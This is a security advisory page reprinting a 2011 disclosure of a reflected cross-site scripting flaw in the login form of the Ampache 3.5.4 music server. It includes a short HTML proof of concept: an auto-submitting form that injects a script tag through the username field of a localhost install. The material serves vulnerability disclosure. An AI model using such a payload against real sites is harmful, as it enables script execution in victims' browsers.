Ampache 3.5.4 Cross Site Scripting

2011.05.10
Credit: AutoSec Tools
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

<!------------------------------------------------------------------------ # Software................Ampache 3.5.4 # Vulnerability...........Reflected Cross-site Scripting # Threat Level............Low (1/5) # Download................http://ampache.org/ # Discovery Date..........5/5/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch <john@autosectools.com> # ------------------------------------------------------------------------ # # # --Description-- # # A reflected cross-site scripting vulnerability in Ampache 3.5.4 can be # exploited to execute arbitrary JavaScript. # # # --PoC--> <html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/ampache-3.5.4/login.php"> <input type="hidden" name="username" value="&quot;><script>alert(0)</script>" /> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top